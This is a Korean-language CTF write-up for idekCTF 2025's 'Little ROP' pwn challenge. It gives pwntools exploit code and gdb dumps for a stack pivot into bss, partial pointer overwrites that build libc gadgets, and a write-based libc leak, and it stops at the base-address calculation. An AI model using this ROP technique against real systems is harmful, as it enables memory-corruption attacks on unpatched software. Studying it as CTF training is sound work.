{"id":3921,"date":"2025-08-12T02:48:11","date_gmt":"2025-08-11T17:48:11","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3921"},"modified":"2025-08-12T02:48:12","modified_gmt":"2025-08-11T17:48:12","slug":"idekctf2025-pwn-little-rop-%eb%b8%8c%ed%8f%ac-x-pop-rdi-%ea%b0%99%ec%9d%80-%ea%b0%80%ec%a0%af%ec%9d%b4-%ec%97%86%ec%9d%8c","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3921","title":{"rendered":"[idekCTF2025] pwn\/Little ROP (\ube0c\ud3ec X, pop rdi \uac19\uc740 \uac00\uc82f\uc774 \uc5c6\uc74c)"},"content":{"rendered":"\n

checksec<\/h2>\n\n\n\n
ubuntu@06287c6a0589:~\/study\/idekctf2025\/LittleROP$ checksec .\/chall\n[*] '\/home\/ubuntu\/study\/idekctf2025\/LittleROP\/chall'\n    Arch:       amd64-64-little\n    RELRO:      Partial RELRO\n    Stack:      No canary found\n    NX:         NX enabled\n    PIE:        No PIE (0x400000)\n    SHSTK:      Enabled\n    IBT:        Enabled\n    Stripped:   No\n<\/pre>\n\n\n\n
Decompiled-src \/ Analysis<\/h2>\n\n\n\n
main \/ setup \/ vuln<\/h3>\n\n\n\n
stdin<\/code>, stdout<\/code>, stderr<\/code>\uc758 \ubc84\ud37c\ub9c1\uc744 \ubaa8\ub450 \ube44\ud65c\uc131\ud654\ud558\uace0, 32\ubc14\uc774\ud2b8\uc758 buf\ub97c read\ub97c \ud1b5\ud574 48\ubc14\uc774\ud2b8\ub9cc\ud07c \uc785\ub825\ubc1b\ub294\ub2e4.<\/p>\n\n\n\n
\ub530\ub77c\uc11c, \ubc84\ud37c \uc624\ubc84\ud50c\ub85c\uc6b0\ub97c \ubc1c\uc0dd\uc2dc\ud0ac \uc218 \uc788\ub294\ub370 16\ubc14\uc774\ud2b8\ub97c \ucd08\uacfc\uc2dc\ud0ac \uc218 \uc788\uc5b4 main\u2019s RBP, RET\uae4c\uc9c0\ub9cc \ub36e\uc744 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  setup(argc, argv, envp);\n  vuln();\n  return 0;\n}\n<\/pre>\n\n\n\n
void setup()\n{\n  setbuf(stdin, 0);\n  setbuf(stdout, 0);\n  setbuf(stderr, 0);\n}\n<\/pre>\n\n\n\n
ssize_t vuln()\n{\n  _BYTE buf[32]; \/\/ [rsp+0h] [rbp-20h] BYREF\n\n  return read(0, buf, 0x30u);\n}\n<\/pre>\n\n\n\n
Solution<\/h2>\n\n\n\n
1. main\u2019s RBP\ub97c 0x404c00 \uc8fc\uc18c\ub85c \ub36e\uace0 main\u2019s RET\uc744 0x4011a9\ub85c \ub36e\uae30<\/h3>\n\n\n\n
\ubc84\ud37c \uc624\ubc84\ud50c\ub85c\uc6b0 \ucde8\uc57d\uc810\uc73c\ub85c rbp, ret\uc744 \ubaa8\ub450 \uc6d0\ud558\ub294 \uac12\uc73c\ub85c \ub36e\uc744 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
main\u2019s rbp\ub97c \uc784\uc758 bss \uc601\uc5ed\uc778 0x404c00 \uc8fc\uc18c\ub85c \ub36e\uace0, main\u2019s ret\uc744 main\uc758 \ud568\uc218 \ud504\ub864\ub85c\uadf8\ub97c \uc81c\uc678\ud55c 0x4011A9 \uc8fc\uc18c\ub85c \ub36e\uc790.<\/strong><\/p>\n\n\n\n
gdb-peda$ vmmap\n...\n**0x00404000         0x00405000         rw-p      \/home\/ubuntu\/study\/idekctf2025\/LittleROP\/chall**\n<\/pre>\n\n\n\n
**.text:000000000040119D vuln            proc near               ; CODE XREF: main+17\u2193p**\n.text:000000000040119D\n.text:000000000040119D buf             = byte ptr -20h\n.text:000000000040119D\n.text:000000000040119D ; __unwind {\n.text:000000000040119D                 endbr64\n.text:00000000004011A1                 push    rbp\n.text:00000000004011A2                 mov     rbp, rsp\n.text:00000000004011A5                 sub     rsp, 20h\n\nBELOW CODE !!!\n.text:00000000004011A9                 lea     rax, [rbp-20h]\n.text:00000000004011AD                 mov     edx, 30h ; '0'  ; nbytes\n.text:00000000004011B2                 mov     rsi, rax        ; buf\n.text:00000000004011B5                 mov     edi, 0          ; fd\n.text:00000000004011BA                 call    _read\n.text:00000000004011BF                 nop\n.text:00000000004011C0                 leave\n.text:00000000004011C1                 retn\n<\/pre>\n\n\n\n
vuln_lea_read = 0x4011a9\nadd_rbp_0x3d_ebx = 0x40113c\n\n# 1. Prepare write to where\npay = b'A'*0x20\npay += p64(0x404c00)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n<\/pre>\n\n\n\n
\uc774\ud6c4\uc5d0 A \ubc14\uc774\ud2b8\ub4e4\uc744 \ucc44\uc6b0\uac8c \ub41c\ub2e4\uba74,<\/p>\n\n\n\n
ip()\ns(b\"A\"*0x30)\n<\/pre>\n\n\n\n
main\u2019s rbp\uc5d0 \ub36e\ud78c \uc784\uc758 bss \uc601\uc5ed\uc778 0x404c00 \uc8fc\uc18c\ub85c \uc778\ud574, 0x404c00-0x20\ubd80\ud130 A \ubc14\uc774\ud2b8\ub4e4\uc774 \ucc44\uc6cc\uc9c4\ub2e4.<\/p>\n\n\n\n
\uc989, \uc784\uc758 bss \uc601\uc5ed \uc8fc\uc18c\ub85c \ubca0\uc774\uc2a4 \ud3ec\uc778\ud130\ub97c \uc124\uc815\ud588\uae30\uc5d0 \ud574\ub2f9 \uc8fc\uc18c\uc5d0 \uac12\uc774 \uc368\uc9c0\ub294 \uac83\uc774\ub2e4.<\/p>\n\n\n\n
gdb-peda$ x\/16gx 0x404c00-0x20\n0x404be0:       0x4141414141414141      0x4141414141414141\n0x404bf0:       0x4141414141414141      0x4141414141414141\n0x404c00:       0x4141414141414141      0x4141414141414141\n0x404c10:       0x0000000000000000      0x0000000000000000\n...\n<\/pre>\n\n\n\n
2. call_setup\uc744 \ud638\ucd9c\uc2dc\ucf1c libc \uad00\ub828 \uc8fc\uc18c \uac00\uc838\uc624\uae30<\/h3>\n\n\n\n
\ubca0\uc774\uc2a4\ud3ec\uc778\ud130\ub97c 0x404b00\uc73c\ub85c \uc9c0\uc815\ud558\uace0, \ub9ac\ud134\uc8fc\uc18c\ub97c call_setup\uc73c\ub85c \ub36e\uc5b4\ubcf8\ub2e4.<\/p>\n\n\n\n
.text:00000000004011C2 main            proc near               ; DATA XREF: _start+18\u2191o\n.text:00000000004011C2 ; __unwind {\n.text:00000000004011C2                 endbr64\n.text:00000000004011C6                 push    rbp\n.text:00000000004011C7                 mov     rbp, rsp\n\n**BELOW CODE !!!**\n**.text:00000000004011CA                 mov     eax, 0\n.text:00000000004011CF                 call    setup\n.text:00000000004011D4                 mov     eax, 0\n.text:00000000004011D9                 call    vuln\n.text:00000000004011DE                 mov     eax, 0\n.text:00000000004011E3                 pop     rbp\n.text:00000000004011E4                 retn\n.text:00000000004011E4 ; } \/\/ starts at 4011C2\n\n.text:0000000000401156                 public setup\n.text:0000000000401156 setup           proc near               ; CODE XREF: main+D\u2193p\n.text:0000000000401156 ; __unwind {\n.text:0000000000401156                 endbr64\n.text:000000000040115A                 push    rbp\n.text:000000000040115B                 mov     rbp, rsp\n.text:000000000040115E                 mov     rax, cs:stdin@GLIBC_2_2_5\n.text:0000000000401165                 mov     esi, 0          ; buf\n.text:000000000040116A                 mov     rdi, rax        ; stream\n.text:000000000040116D                 call    _setbuf\n.text:0000000000401172                 mov     rax, cs:stdout@GLIBC_2_2_5\n.text:0000000000401179                 mov     esi, 0          ; buf\n.text:000000000040117E                 mov     rdi, rax        ; stream\n.text:0000000000401181                 call    _setbuf\n.text:0000000000401186                 mov     rax, cs:stderr@GLIBC_2_2_5\n.text:000000000040118D                 mov     esi, 0          ; buf\n.text:0000000000401192                 mov     rdi, rax        ; stream\n.text:0000000000401195                 call    _setbuf\n.text:000000000040119A                 nop\n.text:000000000040119B                 pop     rbp\n.text:000000000040119C                 retn\n.text:000000000040119C ; } \/\/ starts at 401156**\n<\/pre>\n\n\n\n
# 2. Did libc related address written?\ncall_setup = 0x4011CA\npay = b'A'*0x20\npay += p64(0x404b00)\npay += p64(call_setup)\ns(pay)\nsleep(0.001)\n<\/pre>\n\n\n\n
\uadf8\ub7ec\uba74 0x7ffff7\u2026\ub85c \uc2dc\uc791\ub418\ub294 libc \uad00\ub828 \uc8fc\uc18c\uac00 \uc784\uc758 bss \uc601\uc5ed \uc8fc\uc18c\uc5d0 \uc368\uc9c4\ub2e4.<\/p>\n\n\n\n
gdb-peda$ x\/48gx 0x404b00\n0x404b00:       0x0000000000000000      0x0000000000000000\n0x404b10:       0x0000000000000000      0x0000000000000000\n0x404b20:       0x0000000000000000      0x0000000000000000\n0x404b30:       0x0000000000000000      0x0000000000000000\n0x404b40:       0x0000000000000000      0x0000000000000000\n0x404b50:       0x0000000000000000      0x0000000000000000\n0x404b60:       0x0000000000000000      0x0000000000000000\n0x404b70:       0x0000000000000000      0x00007ffff7fa56a0\n0x404b80:       0x0000000000000000      0x00007ffff7e183f5\n0x404b90:       0x0000000000000000      0x00007ffff7fa56a0\n0x404ba0:       0x0000000000000000      0x0000000000000000\n0x404bb0:       0x00007ffff7fa1600      0x00007ffff7e145ad\n0x404bc0:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404bd0:       0x0000000000000000      0x00000000004011bf\n0x404be0:       0x0000000000404c00      0x00007fffffffe198\n0x404bf0:       0x00000000004011c2      0x000000000040119a\n0x404c00:       0x0000000000404b00      0x00000000004011de\n0x404c10:       0x0000000000000000      0x0000000000000000\n0x404c20:       0x0000000000000000      0x0000000000000000\n...\n\n0x00007ffff7d8a000 0x00007ffff7db2000 r--p      \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n0x00007ffff7db2000 0x00007ffff7f47000 r-xp      \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n0x00007ffff7f47000 0x00007ffff7f9f000 r--p      \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n0x00007ffff7f9f000 0x00007ffff7fa0000 ---p      \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n0x00007ffff7fa0000 0x00007ffff7fa4000 r--p      \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n0x00007ffff7fa4000 0x00007ffff7fa6000 rw-p      \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n<\/pre>\n\n\n\n
3. \ub354 \ub9ce\uc740 libc \uad00\ub828 \uc8fc\uc18c\uac00 bss \uc601\uc5ed\uc5d0 \ub0a8\uae30\uac8c \ud558\uae30<\/h3>\n\n\n\n
2\ubc88 \uc544\uc774\ub514\uc5b4\ub97c \uc751\uc6a9\ud558\uc5ec libc \uad00\ub828 \uc8fc\uc18c\uac00 bss \uc601\uc5ed\uc5d0 \ub354\ub9ce\uc774 \uc368\uc9c0\ub3c4\ub85d fengshui_libc \ud568\uc218\ub97c \ub9cc\ub4e4\uc5c8\ub2e4.<\/p>\n\n\n\n
# 3. libc fengshui\ndef fengshui_libc():\n    for i in range(5):\n        pay = b'B'*0x20\n        pay += p64(0x404c00+0x70*i)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\n        pay = b'C'*0x20\n        pay += p64(0x404900)\n        pay += p64(call_setup) #setup\n        s(pay)\n        sleep(0.001)\n\nfengshui_libc()\n<\/pre>\n\n\n\n
\uacb0\uacfc\ub294 \uc544\ub798\uc640 \uac19\uc774, \uc774\uc804\ubcf4\ub2e4 \ud6e8\uc52c \ub354 \ub9ce\uc774 libc \uad00\ub828 \uc8fc\uc18c\uac00 \uc368\uc9c0\uac8c \ub41c\ub2e4.<\/p>\n\n\n\n
gdb-peda$ x\/96gx 0x404b00\n0x404b00:       0x0000000000000000      0x0000000000000000\n0x404b10:       0x0000000000000000      0x0000000000000000\n0x404b20:       0x0000000000000000      0x0000000000000000\n0x404b30:       0x0000000000000000      0x0000000000000000\n0x404b40:       0x0000000000000000      0x0000000000000000\n0x404b50:       0x0000000000000000      0x0000000000000000\n0x404b60:       0x0000000000000000      0x0000000000000000\n0x404b70:       0x0000000000000000      0x00007ffff7fa56a0\n0x404b80:       0x0000000000000000      0x00007ffff7e183f5\n0x404b90:       0x0000000000000000      0x00007ffff7fa56a0\n0x404ba0:       0x0000000000000000      0x0000000000000000\n0x404bb0:       0x00007ffff7fa1600      0x00007ffff7e145ad\n0x404bc0:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404bd0:       0x0000000000000000      0x00000000004011bf\n0x404be0:       0x4242424242424242      0x00007ffff7fa56a0\n0x404bf0:       0x0000000000000000      0x00007ffff7e183f5\n0x404c00:       0x0000000000404c70      0x00007ffff7fa56a0\n0x404c10:       0x0000000000000000      0x0000000000000000\n0x404c20:       0x00007ffff7fa1600      0x00007ffff7e145ad\n0x404c30:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404c40:       0x0000000000000000      0x00000000004011bf\n0x404c50:       0x4242424242424242      0x00007ffff7fa56a0\n0x404c60:       0x0000000000000000      0x00007ffff7e183f5\n0x404c70:       0x0000000000404ce0      0x00007ffff7fa56a0\n0x404c80:       0x0000000000000000      0x0000000000000000\n0x404c90:       0x00007ffff7fa1600      0x00007ffff7e145ad\n0x404ca0:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404cb0:       0x0000000000000000      0x00000000004011bf\n0x404cc0:       0x4242424242424242      0x00007ffff7fa56a0\n0x404cd0:       0x0000000000000000      0x00007ffff7e183f5\n0x404ce0:       0x0000000000404d50      0x00007ffff7fa56a0\n0x404cf0:       0x0000000000000000      0x0000000000000000\n0x404d00:       0x00007ffff7fa1600      0x00007ffff7e145ad\n0x404d10:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404d20:       0x0000000000000000      0x00000000004011bf\n0x404d30:       0x4242424242424242      0x00007ffff7fa56a0\n0x404d40:       0x0000000000000000      0x00007ffff7e183f5\n0x404d50:       0x0000000000404dc0      0x00007ffff7fa56a0\n0x404d60:       0x0000000000000000      0x0000000000000000\n0x404d70:       0x00007ffff7fa1600      0x00007ffff7e145ad\n0x404d80:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404d90:       0x0000000000000000      0x00000000004011bf\n0x404da0:       0x0000000000404dc0      0x00007fffffffe198\n0x404db0:       0x00000000004011c2      0x000000000040119a\n0x404dc0:       0x0000000000404900      0x00000000004011de\n<\/pre>\n\n\n\n
4. fengshui_rbp_ret \/ fengshui_ret_rbp trick<\/h3>\n\n\n\n
def fengshui_ret_rbp(base):\n    for i in range(2):\n        #set where to write\n        pay = b'b'*0x20\n        pay += p64(base+i*0x20 + 0x20) #where to where\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\n        #rbp reset and write\n        pay = (p64(vuln_lea_read) + p64(0x404a00)) * 2 #what\n        pay += p64(0x404800 + 0x20)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\ndef fengshui_rbp_ret(base):\n    for i in range(2):\n        #set where to write\n        pay = b'b'*0x20\n        pay += p64(base+i*0x20 + 0x20) #where to where\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\n        #rbp reset and write\n        pay = (p64(0x404a00) + p64(vuln_lea_read)) * 2 #write to what\n        pay += p64(0x404800 + 0x20)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n        \n# 0. (overwrite rbp), this will used by \"add    DWORD PTR [rbp-0x3d],ebx\" gadget\nfengshui_rbp_ret(base=0x404d90)\n<\/pre>\n\n\n\n
base \uc8fc\uc18c\ub97c \ub123\uc73c\uba74, RBP\uc640 RET\uc5d0 \uac01\uac01 0x404a00, 0x4011a9 \uc8fc\uc18c\ub85c \uc5ec\ub7ec\ubc88 \uc4f0\uac8c \ub9cc\ub4e4\ub3c4\ub85d 2\uac1c\uc758 fengshui \ud568\uc218\ub97c \ub9cc\ub4e4\uc5b4\ub450\uc5c8\ub2e4.<\/p>\n\n\n\n
2\uac1c\uc758 \ud568\uc218\ub294 \uc368\uc9c0\ub294 rbp, ret \uc21c\uc11c\ub9cc \uc11c\ub85c \ub2e4\ub97c\ubfd0\uc774\ub2e4.<\/p>\n\n\n\n
gdb-peda$ x\/32gx 0x404d90-0x10\n0x404d80:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404d90:       0x0000000000404a00      0x00000000004011a9\n0x404da0:       0x0000000000404a00      0x00000000004011a9\n0x404db0:       0x0000000000404a00      0x00000000004011a9\n0x404dc0:       0x0000000000404a00      0x00000000004011a9\n0x404dd0:       0x0000000000404820      0x00000000004011bf\n<\/pre>\n\n\n\n
\uadf8\ub9ac\uace0 0x404d08 + 0x3d (=0x404d45)\ub97c rbp\ub85c \uc9c0\uc815\ud574\uc8fc\ub294\ub370,<\/p>\n\n\n\n
pay = b'c'*0x20\npay += p64(0x404d70+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(0x404d08 + 0x3d) #set rbp\ns(pay)\nsleep(0.001)\n\n<\/pre>\n\n\n\n
libc \uc601\uc5ed\uc5d0 \uc788\ub294 pop rbx; retn \uac00\uc82f\uc744 \uc0ac\uc6a9\ud558\uae30 \uc704\ud574 1\ubc14\uc774\ud2b8\ub97c \ubc14\uafb8\uae30 \uc704\ud574\uc11c\ub2e4. 0xca\ub85c \ud558\uc704 1\ubc14\uc774\ud2b8\ub97c \ubc14\uafb8\uba74 pop rbx, retn \uac00\uc82f\uc73c\ub85c \ud5a5\ud558\uac8c \ub9cc\ub4e4 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
# 1. set \"pop rbx; retn;\" gadget (overwrite retn)\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d78+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# .text:000000000008A5CA 5B                                      pop     rbx\n# .text:000000000008A5CB C3                                      retn\npay = p8(0xca) #set gadget\ns(pay)\nsleep(0.001)\n<\/pre>\n\n\n\n
gdb-peda$ x\/32gx 0x404d00     \n0x404d00:       0x00007ffff7fa1600      0x00007ffff7e145ad\n0x404d10:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404d20:       0x0000000000000000      0x00000000004011bf\n0x404d30:       0x4242424242424242      0x00007ffff7fa56a0\n0x404d40:       0x0000000000000000      0x00007ffff7e183f5\n0x404d50:       0x0000000000404dc0      0x00007ffff7fa56a0\n0x404d60:       0x0000000000000000      0x0000000000000000\n0x404d70:       0x0000000000404d45      0x00007ffff7e145ca\n0x404d80:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404d90:       0x00000000004011a9      0x0000000000404a00\n0x404da0:       0x00000000004011bf      0x0000000000404a00\n0x404db0:       0x00000000004011a9      0x0000000000404a00\n0x404dc0:       0x00000000004011a9      0x0000000000404a00\n0x404dd0:       0x0000000000404820      0x00000000004011bf\n0x404de0:       0x0000000000000000      0x0000000000000000\n0x404df0:       0x0000000000000000      0x0000000000000000\ngdb-peda$ x\/2i 0x00007ffff7e145ca\n   0x7ffff7e145ca <_IO_new_file_setbuf+42>:     pop    rbx\n   0x7ffff7e145cb <_IO_new_file_setbuf+43>:     ret \n<\/pre>\n\n\n\n
\uadf8\ub9ac\uace0 pop rdi \uac00\uc82f\uc744 \ud5a5\ud558\uac8c \ud558\uae30 \uc704\ud574 “add [rbp-3Dh], ebx; nop; retn;<\/code>” \uac00\uc82f\uc5d0 \uc758\ud574 \ub354\ud574\uc9c8 0x3cddc\uac12\uc744 \uc784\uc758 bss \uc601\uc5ed\uc5d0 \uc18d\ud558\ub294 \uc5d0 0x404d80 \uc8fc\uc18c\uc5d0 \uc4f4\ub2e4.<\/p>\n\n\n\n
.text:000000000040113C                 add     [rbp-3Dh], ebx\n.text:000000000040113F                 nop\n.text:0000000000401140\n.text:0000000000401140 locret_401140:                          ; CODE XREF: __do_global_dtors_aux+B\u2191j\n.text:0000000000401140                 retn\n<\/pre>\n\n\n\n
#2. set rbx value\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d80+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# .text:00000000000C7389 5F                                      pop     rdi\n# .text:00000000000C738A C3                                      retn\npay = p64(0x3cddc) #rbx value (will be added); 0x8a5ad + 0x3cddc = 0xc7389\ns(pay)\nsleep(0.001)\n<\/pre>\n\n\n\n
gdb-peda$ x\/32gx 0x404d00\n0x404d00:       0x00007ffff7fa1600      0x00007ffff7e145ad\n0x404d10:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404d20:       0x0000000000000000      0x00000000004011bf\n0x404d30:       0x4242424242424242      0x00007ffff7fa56a0\n0x404d40:       0x0000000000000000      0x00007ffff7e183f5\n0x404d50:       0x0000000000404dc0      0x00007ffff7fa56a0\n0x404d60:       0x0000000000000000      0x0000000000000000\n0x404d70:       0x0000000000404d45      0x00007ffff7e145ca\n**0x404d80**:       **0x000000000003cddc**      0x00007ffff7e0b57f\n0x404d90:       0x0000000000404a00      0x00000000004011a9\n0x404da0:       0x0000000000404a00      0x00000000004011bf\n0x404db0:       0x0000000000404a00      0x00000000004011a9\n0x404dc0:       0x0000000000404a00      0x00000000004011a9\n0x404dd0:       0x0000000000404820      0x00000000004011bf\n<\/pre>\n\n\n\n
ROP \uccb4\uc778\uc73c\ub85c “add [rbp-3Dh], ebx; nop; retn;<\/code>” \uac00\uc82f\uc744 \uc2e4\ud589\uc2dc\ud0a4\uac8c \ub9cc\ub4e0\ub2e4.<\/p>\n\n\n\n
\uadf8\ub7ec\uba74 0x404d08\uc5d0 pop rdi, retn \uac00\uc82f\uc778 0x00007ffff7e51389 \uac00\uc82f\uc8fc\uc18c\uac00 \uc368\uc9c4\ub2e4.<\/strong><\/p>\n\n\n\n
#3. set \"add [rbp-3Dh], ebx; nop; retn;\" gadget\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d88+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# set rbx\npay = p64(add_rbp_0x3d_ebx) #set gadget\ns(pay)\nsleep(0.001)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d70) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = b'a'*0x1\n# ip()\ns(pay)\nsleep(0.001)\n\n<\/pre>\n\n\n\n
gdb-peda$ x\/32gx 0x404d00\n0x404d00:       0x00007ffff7fa1600      **0x00007ffff7e51389**\n0x404d10:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404d20:       0x0000000000000000      0x00000000004011bf\n0x404d30:       0x4242424242424242      0x00007ffff7fa56a0\n0x404d40:       0x0000000000000000      0x00007ffff7e183f5\n0x404d50:       0x0000000000404d61      0x00007ffff7fa56a0\n0x404d60:       0x0000000000000000      0x0000000000000000\n0x404d70:       0x0000000000404d45      0x00007ffff7e145ca\n0x404d80:       0x000000000003cddc      0x000000000040113c\n0x404d90:       0x00000000004011bf      0x0000000000404a00\n0x404da0:       0x00000000004011a9      0x0000000000404a00\n0x404db0:       0x00000000004011bf      0x0000000000404a00\n0x404dc0:       0x00000000004011a9      0x0000000000404a00\n0x404dd0:       0x0000000000404820      0x00000000004011bf\n0x404de0:       0x0000000000000000      0x0000000000000000\n0x404df0:       0x0000000000000000      0x0000000000000000\n\ngdb-peda$ x\/2i **0x00007ffff7e51389**\n   0x7ffff7e51389 <____wcstoul_l_internal+105>: pop    rdi\n   0x7ffff7e5138a <____wcstoul_l_internal+106>: ret  \n<\/pre>\n\n\n\n
\uc774\uc804 \ud588\ub358 \uc791\uc5c5\uc744 \ub5a0\uc62c\ub9ac\uba74\uc11c \ub9c8\uc800 ROP \uccb4\uc778\uc744 \uad6c\uc131\ud55c\ub2e4.<\/p>\n\n\n\n
\uc774\ubc88\uc5d0\ub294 write \ud568\uc218\uc758 \uccab \ub9e4\uac1c\ubcc0\uc218\ub85c rdi\uac00 \uc138\ud305\ub420 \uac12\uc778 1\uc744 \uc4f0\uace0,
add [rbp-3Dh], ebx; nop; retn;<\/code>” \uac00\uc82f\uc744 \ud1b5\ud574 \uc624\ud504\uc14b \uacc4\uc0b0\uc73c\ub85c write \ud568\uc218 \uc8fc\uc18c\uac00 \uc801\ud788\uac8c \ub9cc\ub4dc\ub294 \uac83\uc774\ub2e4.<\/p>\n\n\n\n
# set rop again\n# 0. (overwrite rbp), this will used by \"add    DWORD PTR [rbp-0x3d],ebx\" gadget\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d70+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(0x404d18 + 0x3d) #set rbp\ns(pay)\nsleep(0.001)\n\n# 1. set \"pop rbx; retn;\" gadget (overwrite retn)\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d78+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# .text:000000000008A5CA 5B                                      pop     rbx\n# .text:000000000008A5CB C3                                      retn\npay = p8(0xca) #set gadget\ns(pay)\nsleep(0.001)\n\n#2. set rbx value\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d80+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# .text:0000000000114870                         write \npay = p64(0x932f1) #rbx value (will be added); 0x8157f + 0x932f1 = 0x114870\ns(pay)\nsleep(0.001)\n\n#3. set \"add [rbp-3Dh], ebx; nop; retn;\" gadget\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d88+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# set rbx\npay = p64(add_rbp_0x3d_ebx) #set gadget\ns(pay)\nsleep(0.001)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d70) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = b'a'*0x1\n# ip()\ns(pay)\nsleep(0.001)\n\n# will be used rbp when run \"pop rdi\" gadget\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'c'*0x20\npay += p64(0x404d00+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(0x404a00) \ns(pay)\nsleep(0.001)\n\n# will be used when run \"pop rdi\" gadget\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'c'*0x20\npay += p64(0x404d10+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(1) #set rdi\ns(pay)\nsleep(0.001)\n\n# set ret\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'd'*0x20\npay += p64(0x404d20+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d00) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = b'a'*0x1\nip()\ns(pay)\nsleep(0.001)\n<\/pre>\n\n\n\n
gdb-peda$ x\/32gx 0x404d00\n0x404d00:       0x0000000000404a00 <- \ub36e\uc5b4\uc4f0\uc77c rbp     0x00007ffff7e51389 <- pop rdi, retn\n0x404d10:       0x0000000000000001 <- rdi valuie      0x00007ffff7e9e870 <- write \ud568\uc218\n0x404d20:       0x00000000004011a9 <- vuln_lea_read     0x00000000004011a9\n0x404d30:       0x0000000000404a00      0x00000000004011a9\n0x404d40:       0x0000000000404a00      0x00000000004011bf\n0x404d50:       0x0000000000404a00      0x00000000004011a9\n0x404d60:       0x0000000000404820      0x00000000004011bf\n0x404d70:       0x0000000000404d55      0x00007ffff7e145ca\n0x404d80:       0x00000000000932f1      0x000000000040113c\n0x404d90:       0x00000000004011bf      0x0000000000404a00\n0x404da0:       0x00000000004011a9      0x0000000000404a00\n0x404db0:       0x00000000004011bf      0x0000000000404a00\n0x404dc0:       0x00000000004011a9      0x0000000000404a00\n0x404dd0:       0x0000000000404820      0x00000000004011bf\n0x404de0:       0x0000000000000000      0x0000000000000000\n0x404df0:       0x0000000000000000      0x0000000000000000\ngdb-peda$ x\/a 0x00007ffff7e9e870\n0x7ffff7e9e870 <__GI___libc_write>:     0x25048b64fa1e0ff3\ngdb-peda$ x\/i 0x00007ffff7e9e870\n   0x7ffff7e9e870 <__GI___libc_write>:  endbr64 \n<\/pre>\n\n\n\n
\uadf8\ub7ec\uba74 write \ud568\uc218\uac00 \ud638\ucd9c\ub418\uc5b4 bss \uc601\uc5ed\uc5d0 \uc788\ub358 libc \uad00\ub828\uc8fc\uc18c\uac00 \ucd9c\uaca9\ud558\uac8c \ub418\ub294\ub370, \uc57d\uac04\uc758 \uc624\ud504\uc14b \uacc4\uc0b0\uc73c\ub85c libc \ubca0\uc774\uc2a4 \uc8fc\uc18c\ub97c \uad6c\ud560 \uc218 \uc788\uc5c8\ub2e4.<\/p>\n\n\n\n
leak = r(0x10)\nleak = leak[8:8+8]\ninfo(f\"leak: {leak}\")\nleak = uu64(leak)\ninfo(f\"leak: {hex(leak)}\")\nl.address = leak - l.sym._IO_2_1_stderr_\ninfo(f\"libc base: {hex(l.address)}\")\n\nr(0x20)\n<\/pre>\n\n\n\n
